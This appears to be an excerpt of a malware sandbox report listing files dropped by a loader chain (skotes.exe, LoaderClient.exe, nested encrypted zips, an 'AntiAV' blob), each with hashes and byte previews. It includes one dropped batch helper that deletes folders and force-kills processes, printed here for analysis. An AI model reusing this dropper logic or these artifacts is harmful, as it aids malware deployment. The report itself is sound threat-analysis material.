SHA-512:	69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
Malicious:	false
Reputation:	unknown
Preview:	[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..

C:\Users\user\AppData\Local\Temp\_MEI85002\win32api.cp310-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	134656
Entropy (8bit):	5.84231912519238
Encrypted:	false
SSDEEP:	3072:UTqjiGbjKyRYDoe/hnLbAZ4l39KxN36w/Ii/MVjmzuQrEZ5nOmdZsQ/:DKyRCoe/joxNqw/v/MVjOu7VOI
MD5:	EC7C48EA92D9FF0C32C6D87EE8358BD0
SHA1:	A67A417FDB36C84871D0E61BFB1015CB30C9898A
SHA-256:	A0F3CC0E98BEA5A598E0D4367272E4C65BF446F21932DC2A051546B098D6CE62
SHA-512:	C06E3C0260B918509947A89518D55F0CB03CB19FC28D9E7ED9E3F837D71DF31154F0093929446A93A7C7DA1293FFD0CC69547E2540F15E3055FE1D12D837F935
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A$. J.. J.. J..X.. J..~K.. J..~I.. J..~N.. J.&~K.. J..IK.. J..~O.. J..BK.. J.. K..!J.&~O.. J.&~J.. J.&~H.. J.Rich. J.........................PE..d......a.........." .........................................................`............`.........................................`................@.......................P.......~..T...........................P}............... .........@....................text............................... ..`.rdata..r.... ......................@..@.data....#......."..................@....pdata..............................@..@.gfids..4....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI85002\win32trace.cp310-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22528
Entropy (8bit):	5.158789189249445
Encrypted:	false
SSDEEP:	384:6urA4fVFfFRGFV8fuL0G0T84Q9NNNIRV0KlnOjUgx908x8J:F7XsF9NNNIR2Eny908x8
MD5:	E726734D5D2E42CF0861D24BCF741B09
SHA1:	6AF8A994AD84259F7CF2A8F452B55AE44264BCC6
SHA-256:	3592ABD55C972C9DFE2BAC104FBE3E1B4D1E392A3D29D7C5DB3745A624FA6FF4
SHA-512:	2B60EDD06124C8F053D4573328697A9AF4D6EB077DCDBF833BA3E6DB574A7C32ABF1C72530C43CCBDE313A59066393DADAF2AAE8A7CC3FDB156ADD894D898542
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................."..........................................................................Rich............PE..d...~..a.........." .....&.......... (....................................................`.........................................pP..d....P...............p..`...............x....H..T...........................0I...............@...............................text....%.......&.................. ..`.rdata..\|....@.......*..............@..@.data........`.......F..............@....pdata..`....p.......L..............@..@.gfids...............P..............@..@.rsrc................R..............@..@.reloc..x............V..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI85002\win32ui.cp310-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1427456
Entropy (8bit):	5.324047632064682
Encrypted:	false
SSDEEP:	12288:gAEcgh+WcQNWxzi7HE699jXRZbkGX/VqtpkZAJRb8tUTfU2Bz:DEcvVGWQhHFNWBJ9H
MD5:	9BF4110256A7B953AFA9D43A3E0944BB
SHA1:	0D605B4D5FED9F7861C440B62BB02181E39EFA2B
SHA-256:	484C51248076FB77A6FC5FB512A37BB404025568CDC8702D252DF2191DC720A4
SHA-512:	07740EB7AE3B6D1091064AA2E550515D9AEC0C021B316E4BB9EFD21984322C7765F84A9110C1FCB59164B529FFB04C2B6D6611AB55C764D5D360B27F094A120C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........G..............C.....................................................8...........]...................../.............Rich....................PE..d.../..a.........." .....x...L............................................................`..........................................`...T......h............0............... ..P]......T......................(...@....................0...........................text... w.......x.................. ..`.rdata...w.......x...\|..............@..@.data...............................@....pdata.......0......................@..@.gfids..@............L..............@..@.tls.................N..............@....rsrc................P..............@..@.reloc..P]... ...^...j..............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54ywzciv.0vp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbnlmpgx.yk3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qlzpptsx.bqf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qupcmuvp.fi2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3028480
Entropy (8bit):	6.522411107697113
Encrypted:	false
SSDEEP:	49152:d626AK+dEI8BfYkpYTuxh5h4p7FTa0NhxmZB:wnAKiEIUdp7xh49tRNcB
MD5:	524AFF0AE21CF7D4731596E8F3967E32
SHA1:	27A75996DFD0AE578E28613F275B0517C0BBD975
SHA-256:	A9CE24B52ECE47DFB287B912C5223C5B659DF5C2FECE87141DFA5820ECDA23FD
SHA-512:	B65D7BB349D6FEE6714BD5B92F2CDAD7E69A6D9DDEB6F4CDDC808D18A4982A5C9E3CFDAAB842667F7FB2C94A8C809AEAB5BFE229CA696152D08F3EE453D29334
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2...../y....@.................................W...k.......D.....................1...............................1..................................................... . ............................@....rsrc...D...........................@....idata ............................@...syfpipoa. +.......+.................@...kqlprvhw......1.....................@....taggant.0....1.."..................@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\ax1gjj2j

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:qn:qn
MD5:	3F1D1D8D87177D3D8D897D7E421F84D6
SHA1:	DD082D742A5CB751290F1DB2BD519C286AA86D95
SHA-256:	F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
SHA-512:	2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
Malicious:	false
Reputation:	unknown
Preview:	blat

C:\Users\user\AppData\Local\Temp\main\7z.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1679360
Entropy (8bit):	6.278252955513617
Encrypted:	false
SSDEEP:	24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
MD5:	72491C7B87A7C2DD350B727444F13BB4
SHA1:	1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
SHA-256:	34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
SHA-512:	583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......\|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\7z.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468992
Entropy (8bit):	6.157743912672224
Encrypted:	false
SSDEEP:	6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
MD5:	619F7135621B50FD1900FF24AADE1524
SHA1:	6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
SHA-256:	344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
SHA-512:	2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.855194602218789
Encrypted:	false
SSDEEP:	6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
MD5:	68CECDF24AA2FD011ECE466F00EF8450
SHA1:	2F859046187E0D5286D0566FAC590B1836F6E1B7
SHA-256:	64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
SHA-512:	471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
Malicious:	false
Reputation:	unknown
Preview:	Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2355713
Entropy (8bit):	5.891648193754473
Encrypted:	false
SSDEEP:	24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
MD5:	579A63BEBCCBACAB8F14132F9FC31B89
SHA1:	FCA8A51077D352741A9C1FF8A493064EF5052F27
SHA-256:	0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
SHA-512:	4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
Malicious:	false
Reputation:	unknown
Preview:	KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1799594
Entropy (8bit):	7.99773141173711
Encrypted:	true
SSDEEP:	49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
MD5:	5659EBA6A774F9D5322F249AD989114A
SHA1:	4BFB12AA98A1DC2206BAA0AC611877B815810E4C
SHA-256:	E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
SHA-512:	F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
Malicious:	true
Reputation:	unknown
Preview:	PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..

C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799748
Entropy (8bit):	7.997729415613798
Encrypted:	true
SSDEEP:	49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
MD5:	5404286EC7853897B3BA00ADF824D6C1
SHA1:	39E543E08B34311B82F6E909E1E67E2F4AFEC551
SHA-256:	EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
SHA-512:	C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
Malicious:	true
Reputation:	unknown
Preview:	PK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./

C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799902
Entropy (8bit):	7.997726708945573
Encrypted:	true
SSDEEP:	49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
MD5:	5EB39BA3698C99891A6B6EB036CFB653
SHA1:	D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
SHA-256:	E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
SHA-512:	6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..

C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800056
Entropy (8bit):	7.997723543142523
Encrypted:	true
SSDEEP:	49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
MD5:	7187CC2643AFFAB4CA29D92251C96DEE
SHA1:	AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
SHA-256:	C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
SHA-512:	27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800210
Entropy (8bit):	7.997720745184939
Encrypted:	true
SSDEEP:	49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
MD5:	B7D1E04629BEC112923446FDA5391731
SHA1:	814055286F963DDAA5BF3019821CB8A565B56CB8
SHA-256:	4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
SHA-512:	79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800364
Entropy (8bit):	7.997716835838842
Encrypted:	true
SSDEEP:	49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
MD5:	0DC4014FACF82AA027904C1BE1D403C1
SHA1:	5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
SHA-256:	A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
SHA-512:	CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
Malicious:	true
Reputation:	unknown
